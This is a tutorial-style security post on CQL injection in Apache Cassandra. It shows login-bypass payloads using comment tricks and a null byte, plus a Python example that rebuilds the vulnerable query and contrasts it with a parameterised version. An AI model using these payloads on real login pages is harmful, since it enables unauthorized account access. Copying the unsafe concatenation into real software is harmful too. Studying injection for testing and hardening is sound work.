Apache Cassandra is a free and open-source distributed NoSQL (Not only SQL) database designed to handle large amounts of data. It's one of the most popular databases today (15th according to this StackOverflow survey) and the second most popular NoSQL database according to here and here.
Cassandra is one of the NoSQL databases whose query language is closest to traditional SQL: it's called Cassandra Query Language, or CQL.
It's a kind of SQL, but heavily simplified: there are no joins or unions, no stacked queries, not even an OR operator! So how can it be useful to a tester or attacker?
Let’s start with our classic 101, login bypass, by checking the challenge in our Database Injections Forum.
To build a classic query like the one we'd use in MySQL, for example, we need a little tweaking, as we see in that screenshot of the CQL client.
The ALLOW FILTERING clause is required for the query to execute at all (CQL demands it whenever the WHERE clause restricts columns that are not part of the primary key), so it's added to the PHP code, resulting in the following.
SELECT * FROM users WHERE user = '$INPUT1' AND pass = '$INPUT2' ALLOW FILTERING;
The login page does no input filtering at all. But even knowing that, we can't simply comment out the rest of the query, because the trailing ALLOW FILTERING clause has to survive for the query to run. So why is it so hard to bypass the login screen?
Because in Cassandra the well-known SQLi tricks like ' or ''=' and the like will fail miserably: there's simply no OR in Cassandra Query Language!
Well, we can still use AND!
username: admin'/*
password: */and pass>'
Try it here.
By supplying admin as the user, breaking out of the string and opening a comment with /*, we swallow the hanging quote and the "pass" column check. Then we use the password field to close the comment and resume the query.
We use the AND operator and, by guessing the "pass" column/key name, the greater-than operator to match any value that sorts after the empty string ''. That's pretty much any password, of course.
This is what the resulting query looks like; everything between /* and */ is the commented-out section.
SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILTERING;
It's also possible to bypass login with a null byte:
username: admin' ALLOW FILTERING; %00
password: ANY
If there's no keyword filtering, character limiting or WAF. Not as cool as the other one, though! Hey @haxel0rd! 😉
— Rodolfo Assis (@rodoassis) September 6, 2018
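The following is an added example, not code from the original post or from the challenge's PHP. It rebuilds the login query exactly the way the page's concatenation does, then shows what the CQL parser effectively sees for both payloads above: the /* ... */ trick (comments are removed by a quote-aware stripper, so a comment marker inside a string literal is left alone) and the %00 trick (modelled as a consumer that stops at the first NUL byte; whether a given driver really truncates there is an assumption about the environment, not a property of Cassandra). The users table and user/pass column names come from the page; the hardened build_safe_query helper with ? placeholders is an assumed illustration of the prepared-statement form.

```python
# Added example (not from the original post). Mirrors the page's PHP string
# concatenation and shows the effective query after comment stripping and
# NUL-byte truncation. Table/column names are from the page; the rest is assumed.

VULNERABLE_TEMPLATE = (
    "SELECT * FROM users WHERE user = '{user}' AND pass = '{pw}' ALLOW FILTERING;"
)


def build_vulnerable_query(user: str, pw: str) -> str:
    """Concatenate raw input into CQL, like the page's PHP (unsafe by design)."""
    return VULNERABLE_TEMPLATE.format(user=user, pw=pw)


def truncate_at_nul(query: str) -> str:
    """Model a C-string style consumer that stops at the first NUL byte.
    %00 in a URL decodes to this byte. Assumption: not every driver does this."""
    nul = query.find("\x00")
    return query if nul < 0 else query[:nul]


def strip_block_comments(query: str) -> str:
    """Drop /* ... */ comments the way a lexer would, treating each comment as a
    single space, and ignore comment markers inside single-quoted literals
    (where '' is an escaped quote)."""
    out = []
    i, n = 0, len(query)
    in_string = in_comment = False
    while i < n:
        c = query[i]
        if in_comment:
            if query.startswith("*/", i):
                in_comment = False
                out.append(" ")
                i += 2
            else:
                i += 1
            continue
        if in_string:
            out.append(c)
            if c == "'":
                if i + 1 < n and query[i + 1] == "'":  # '' inside a literal
                    out.append("'")
                    i += 2
                    continue
                in_string = False
            i += 1
            continue
        if query.startswith("/*", i):
            in_comment = True
            i += 2
            continue
        if c == "'":
            in_string = True
        out.append(c)
        i += 1
    return "".join(out)


def effective_query(user: str, pw: str) -> str:
    """What the parser evaluates: truncation happens on the raw bytes first,
    comment removal happens at lex time."""
    return strip_block_comments(truncate_at_nul(build_vulnerable_query(user, pw)))


def build_safe_query(user: str, pw: str):
    """Hardened form (assumed illustration): placeholders plus bound values.
    With the DataStax Python driver this is the pattern
    session.execute(session.prepare(cql), (user, pw)); the input never becomes
    part of the statement text, so quotes, comments and NUL bytes are just data."""
    cql = "SELECT * FROM users WHERE user = ? AND pass = ? ALLOW FILTERING"
    return cql, (user, pw)


if __name__ == "__main__":
    # Constructed inputs: the two payloads from the post.
    print(effective_query("admin'/*", "*/and pass>'"))
    print(effective_query("admin' ALLOW FILTERING; \x00", "ANY"))
    print(build_safe_query("admin'/*", "*/and pass>'"))
```

Running it prints the comment-free query with the pass check replaced by `and pass>''`, the truncated query that ends right after `ALLOW FILTERING;`, and the parameterised statement in which the same payloads are inert bound values.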
Stay tuned for part 2, where we will discuss where and when we can take advantage of injections in the Cassandra database. See you!
P.S.: the source code is in the directory index.